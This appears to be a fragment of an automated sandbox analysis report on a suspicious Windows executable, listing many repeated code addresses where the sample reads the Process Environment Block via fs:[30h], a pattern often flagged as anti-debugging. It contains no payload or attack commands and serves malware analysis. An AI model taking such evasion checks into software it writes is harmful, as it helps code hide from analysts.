Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0123E53E mov eax, dword ptr fs:[00000030h]	6_2_0123E53E
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0123E53E mov eax, dword ptr fs:[00000030h]	6_2_0123E53E
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0123E53E mov eax, dword ptr fs:[00000030h]	6_2_0123E53E
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0123E53E mov eax, dword ptr fs:[00000030h]	6_2_0123E53E
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0123E53E mov eax, dword ptr fs:[00000030h]	6_2_0123E53E
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012A6500 mov eax, dword ptr fs:[00000030h]	6_2_012A6500
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012E4500 mov eax, dword ptr fs:[00000030h]	6_2_012E4500
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012E4500 mov eax, dword ptr fs:[00000030h]	6_2_012E4500
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012E4500 mov eax, dword ptr fs:[00000030h]	6_2_012E4500
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012E4500 mov eax, dword ptr fs:[00000030h]	6_2_012E4500
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012E4500 mov eax, dword ptr fs:[00000030h]	6_2_012E4500
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012E4500 mov eax, dword ptr fs:[00000030h]	6_2_012E4500
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012E4500 mov eax, dword ptr fs:[00000030h]	6_2_012E4500
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0124656A mov eax, dword ptr fs:[00000030h]	6_2_0124656A
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0124656A mov eax, dword ptr fs:[00000030h]	6_2_0124656A
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0124656A mov eax, dword ptr fs:[00000030h]	6_2_0124656A
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01218550 mov eax, dword ptr fs:[00000030h]	6_2_01218550
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01218550 mov eax, dword ptr fs:[00000030h]	6_2_01218550
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012905A7 mov eax, dword ptr fs:[00000030h]	6_2_012905A7
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012905A7 mov eax, dword ptr fs:[00000030h]	6_2_012905A7
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012905A7 mov eax, dword ptr fs:[00000030h]	6_2_012905A7
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012345B1 mov eax, dword ptr fs:[00000030h]	6_2_012345B1
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012345B1 mov eax, dword ptr fs:[00000030h]	6_2_012345B1
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01212582 mov eax, dword ptr fs:[00000030h]	6_2_01212582
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01212582 mov ecx, dword ptr fs:[00000030h]	6_2_01212582
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01244588 mov eax, dword ptr fs:[00000030h]	6_2_01244588
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0124E59C mov eax, dword ptr fs:[00000030h]	6_2_0124E59C
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012125E0 mov eax, dword ptr fs:[00000030h]	6_2_012125E0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0123E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0123E5E7
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0123E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0123E5E7
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0123E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0123E5E7
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0123E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0123E5E7
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0123E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0123E5E7
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0123E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0123E5E7
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0123E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0123E5E7
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0123E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0123E5E7
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0124C5ED mov eax, dword ptr fs:[00000030h]	6_2_0124C5ED
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0124C5ED mov eax, dword ptr fs:[00000030h]	6_2_0124C5ED
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0124E5CF mov eax, dword ptr fs:[00000030h]	6_2_0124E5CF
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0124E5CF mov eax, dword ptr fs:[00000030h]	6_2_0124E5CF
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012165D0 mov eax, dword ptr fs:[00000030h]	6_2_012165D0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0124A5D0 mov eax, dword ptr fs:[00000030h]	6_2_0124A5D0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0124A5D0 mov eax, dword ptr fs:[00000030h]	6_2_0124A5D0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0120E420 mov eax, dword ptr fs:[00000030h]	6_2_0120E420
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0120E420 mov eax, dword ptr fs:[00000030h]	6_2_0120E420
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0120E420 mov eax, dword ptr fs:[00000030h]	6_2_0120E420
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0120C427 mov eax, dword ptr fs:[00000030h]	6_2_0120C427
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01296420 mov eax, dword ptr fs:[00000030h]	6_2_01296420
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01296420 mov eax, dword ptr fs:[00000030h]	6_2_01296420
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01296420 mov eax, dword ptr fs:[00000030h]	6_2_01296420
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01296420 mov eax, dword ptr fs:[00000030h]	6_2_01296420
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01296420 mov eax, dword ptr fs:[00000030h]	6_2_01296420
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01296420 mov eax, dword ptr fs:[00000030h]	6_2_01296420
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01296420 mov eax, dword ptr fs:[00000030h]	6_2_01296420
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0124A430 mov eax, dword ptr fs:[00000030h]	6_2_0124A430
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01248402 mov eax, dword ptr fs:[00000030h]	6_2_01248402
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01248402 mov eax, dword ptr fs:[00000030h]	6_2_01248402
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01248402 mov eax, dword ptr fs:[00000030h]	6_2_01248402
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0129C460 mov ecx, dword ptr fs:[00000030h]	6_2_0129C460
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0123A470 mov eax, dword ptr fs:[00000030h]	6_2_0123A470
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0123A470 mov eax, dword ptr fs:[00000030h]	6_2_0123A470
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0123A470 mov eax, dword ptr fs:[00000030h]	6_2_0123A470
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0124E443 mov eax, dword ptr fs:[00000030h]	6_2_0124E443
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0124E443 mov eax, dword ptr fs:[00000030h]	6_2_0124E443
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0124E443 mov eax, dword ptr fs:[00000030h]	6_2_0124E443
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0124E443 mov eax, dword ptr fs:[00000030h]	6_2_0124E443
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0124E443 mov eax, dword ptr fs:[00000030h]	6_2_0124E443
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0124E443 mov eax, dword ptr fs:[00000030h]	6_2_0124E443
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0124E443 mov eax, dword ptr fs:[00000030h]	6_2_0124E443
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0124E443 mov eax, dword ptr fs:[00000030h]	6_2_0124E443
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0123245A mov eax, dword ptr fs:[00000030h]	6_2_0123245A
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0120645D mov eax, dword ptr fs:[00000030h]	6_2_0120645D
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012164AB mov eax, dword ptr fs:[00000030h]	6_2_012164AB
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012444B0 mov ecx, dword ptr fs:[00000030h]	6_2_012444B0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0129A4B0 mov eax, dword ptr fs:[00000030h]	6_2_0129A4B0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012104E5 mov ecx, dword ptr fs:[00000030h]	6_2_012104E5
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0124C720 mov eax, dword ptr fs:[00000030h]	6_2_0124C720
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0124C720 mov eax, dword ptr fs:[00000030h]	6_2_0124C720
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0124273C mov eax, dword ptr fs:[00000030h]	6_2_0124273C
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0124273C mov ecx, dword ptr fs:[00000030h]	6_2_0124273C
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0124273C mov eax, dword ptr fs:[00000030h]	6_2_0124273C
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0128C730 mov eax, dword ptr fs:[00000030h]	6_2_0128C730
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0124C700 mov eax, dword ptr fs:[00000030h]	6_2_0124C700
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01210710 mov eax, dword ptr fs:[00000030h]	6_2_01210710
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01240710 mov eax, dword ptr fs:[00000030h]	6_2_01240710
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01218770 mov eax, dword ptr fs:[00000030h]	6_2_01218770
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01220770 mov eax, dword ptr fs:[00000030h]	6_2_01220770
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01220770 mov eax, dword ptr fs:[00000030h]	6_2_01220770
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01220770 mov eax, dword ptr fs:[00000030h]	6_2_01220770
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01220770 mov eax, dword ptr fs:[00000030h]	6_2_01220770
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01220770 mov eax, dword ptr fs:[00000030h]	6_2_01220770
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01220770 mov eax, dword ptr fs:[00000030h]	6_2_01220770
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01220770 mov eax, dword ptr fs:[00000030h]	6_2_01220770
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01220770 mov eax, dword ptr fs:[00000030h]	6_2_01220770
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01220770 mov eax, dword ptr fs:[00000030h]	6_2_01220770
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01220770 mov eax, dword ptr fs:[00000030h]	6_2_01220770
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01220770 mov eax, dword ptr fs:[00000030h]	6_2_01220770
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01220770 mov eax, dword ptr fs:[00000030h]	6_2_01220770
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0124674D mov esi, dword ptr fs:[00000030h]	6_2_0124674D
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0124674D mov eax, dword ptr fs:[00000030h]	6_2_0124674D
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0124674D mov eax, dword ptr fs:[00000030h]	6_2_0124674D
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01210750 mov eax, dword ptr fs:[00000030h]	6_2_01210750
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0129E75D mov eax, dword ptr fs:[00000030h]	6_2_0129E75D
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01252750 mov eax, dword ptr fs:[00000030h]	6_2_01252750
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01252750 mov eax, dword ptr fs:[00000030h]	6_2_01252750
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01294755 mov eax, dword ptr fs:[00000030h]	6_2_01294755
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012107AF mov eax, dword ptr fs:[00000030h]	6_2_012107AF
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012B678E mov eax, dword ptr fs:[00000030h]	6_2_012B678E
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0129E7E1 mov eax, dword ptr fs:[00000030h]	6_2_0129E7E1
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012327ED mov eax, dword ptr fs:[00000030h]	6_2_012327ED
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012327ED mov eax, dword ptr fs:[00000030h]	6_2_012327ED
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012327ED mov eax, dword ptr fs:[00000030h]	6_2_012327ED
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012147FB mov eax, dword ptr fs:[00000030h]	6_2_012147FB
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012147FB mov eax, dword ptr fs:[00000030h]	6_2_012147FB
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0121C7C0 mov eax, dword ptr fs:[00000030h]	6_2_0121C7C0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012907C3 mov eax, dword ptr fs:[00000030h]	6_2_012907C3
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01246620 mov eax, dword ptr fs:[00000030h]	6_2_01246620
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01248620 mov eax, dword ptr fs:[00000030h]	6_2_01248620
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0122E627 mov eax, dword ptr fs:[00000030h]	6_2_0122E627
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0121262C mov eax, dword ptr fs:[00000030h]	6_2_0121262C
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0128E609 mov eax, dword ptr fs:[00000030h]	6_2_0128E609
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0122260B mov eax, dword ptr fs:[00000030h]	6_2_0122260B
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0122260B mov eax, dword ptr fs:[00000030h]	6_2_0122260B
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0122260B mov eax, dword ptr fs:[00000030h]	6_2_0122260B
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0122260B mov eax, dword ptr fs:[00000030h]	6_2_0122260B
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0122260B mov eax, dword ptr fs:[00000030h]	6_2_0122260B
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0122260B mov eax, dword ptr fs:[00000030h]	6_2_0122260B
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0122260B mov eax, dword ptr fs:[00000030h]	6_2_0122260B
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01252619 mov eax, dword ptr fs:[00000030h]	6_2_01252619
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012D866E mov eax, dword ptr fs:[00000030h]	6_2_012D866E
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012D866E mov eax, dword ptr fs:[00000030h]	6_2_012D866E
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0124A660 mov eax, dword ptr fs:[00000030h]	6_2_0124A660
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0124A660 mov eax, dword ptr fs:[00000030h]	6_2_0124A660
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01242674 mov eax, dword ptr fs:[00000030h]	6_2_01242674
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0122C640 mov eax, dword ptr fs:[00000030h]	6_2_0122C640
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0124C6A6 mov eax, dword ptr fs:[00000030h]	6_2_0124C6A6
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012466B0 mov eax, dword ptr fs:[00000030h]	6_2_012466B0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01214690 mov eax, dword ptr fs:[00000030h]	6_2_01214690
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01214690 mov eax, dword ptr fs:[00000030h]	6_2_01214690
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012906F1 mov eax, dword ptr fs:[00000030h]	6_2_012906F1
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012906F1 mov eax, dword ptr fs:[00000030h]	6_2_012906F1
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0128E6F2 mov eax, dword ptr fs:[00000030h]	6_2_0128E6F2
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0128E6F2 mov eax, dword ptr fs:[00000030h]	6_2_0128E6F2
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0128E6F2 mov eax, dword ptr fs:[00000030h]	6_2_0128E6F2
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0128E6F2 mov eax, dword ptr fs:[00000030h]	6_2_0128E6F2
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0124A6C7 mov ebx, dword ptr fs:[00000030h]	6_2_0124A6C7
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0124A6C7 mov eax, dword ptr fs:[00000030h]	6_2_0124A6C7
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012A892B mov eax, dword ptr fs:[00000030h]	6_2_012A892B
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0129892A mov eax, dword ptr fs:[00000030h]	6_2_0129892A
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0128E908 mov eax, dword ptr fs:[00000030h]	6_2_0128E908
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0128E908 mov eax, dword ptr fs:[00000030h]	6_2_0128E908
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01208918 mov eax, dword ptr fs:[00000030h]	6_2_01208918
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01208918 mov eax, dword ptr fs:[00000030h]	6_2_01208918
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0129C912 mov eax, dword ptr fs:[00000030h]	6_2_0129C912
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01236962 mov eax, dword ptr fs:[00000030h]	6_2_01236962
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01236962 mov eax, dword ptr fs:[00000030h]	6_2_01236962
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01236962 mov eax, dword ptr fs:[00000030h]	6_2_01236962
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0125096E mov eax, dword ptr fs:[00000030h]	6_2_0125096E
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0125096E mov edx, dword ptr fs:[00000030h]	6_2_0125096E
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0125096E mov eax, dword ptr fs:[00000030h]	6_2_0125096E
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012B4978 mov eax, dword ptr fs:[00000030h]	6_2_012B4978
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012B4978 mov eax, dword ptr fs:[00000030h]	6_2_012B4978
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0129C97C mov eax, dword ptr fs:[00000030h]	6_2_0129C97C
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01290946 mov eax, dword ptr fs:[00000030h]	6_2_01290946
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012229A0 mov eax, dword ptr fs:[00000030h]	6_2_012229A0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012229A0 mov eax, dword ptr fs:[00000030h]	6_2_012229A0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012229A0 mov eax, dword ptr fs:[00000030h]	6_2_012229A0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012229A0 mov eax, dword ptr fs:[00000030h]	6_2_012229A0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012229A0 mov eax, dword ptr fs:[00000030h]	6_2_012229A0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012229A0 mov eax, dword ptr fs:[00000030h]	6_2_012229A0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012229A0 mov eax, dword ptr fs:[00000030h]	6_2_012229A0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012229A0 mov eax, dword ptr fs:[00000030h]	6_2_012229A0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012229A0 mov eax, dword ptr fs:[00000030h]	6_2_012229A0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012229A0 mov eax, dword ptr fs:[00000030h]	6_2_012229A0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012229A0 mov eax, dword ptr fs:[00000030h]	6_2_012229A0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012229A0 mov eax, dword ptr fs:[00000030h]	6_2_012229A0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012229A0 mov eax, dword ptr fs:[00000030h]	6_2_012229A0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012109AD mov eax, dword ptr fs:[00000030h]	6_2_012109AD
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012109AD mov eax, dword ptr fs:[00000030h]	6_2_012109AD
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012989B3 mov esi, dword ptr fs:[00000030h]	6_2_012989B3
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012989B3 mov eax, dword ptr fs:[00000030h]	6_2_012989B3
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012989B3 mov eax, dword ptr fs:[00000030h]	6_2_012989B3
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0129E9E0 mov eax, dword ptr fs:[00000030h]	6_2_0129E9E0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012429F9 mov eax, dword ptr fs:[00000030h]	6_2_012429F9
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012429F9 mov eax, dword ptr fs:[00000030h]	6_2_012429F9
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012A69C0 mov eax, dword ptr fs:[00000030h]	6_2_012A69C0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0121A9D0 mov eax, dword ptr fs:[00000030h]	6_2_0121A9D0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0121A9D0 mov eax, dword ptr fs:[00000030h]	6_2_0121A9D0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0121A9D0 mov eax, dword ptr fs:[00000030h]	6_2_0121A9D0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0121A9D0 mov eax, dword ptr fs:[00000030h]	6_2_0121A9D0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0121A9D0 mov eax, dword ptr fs:[00000030h]	6_2_0121A9D0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0121A9D0 mov eax, dword ptr fs:[00000030h]	6_2_0121A9D0
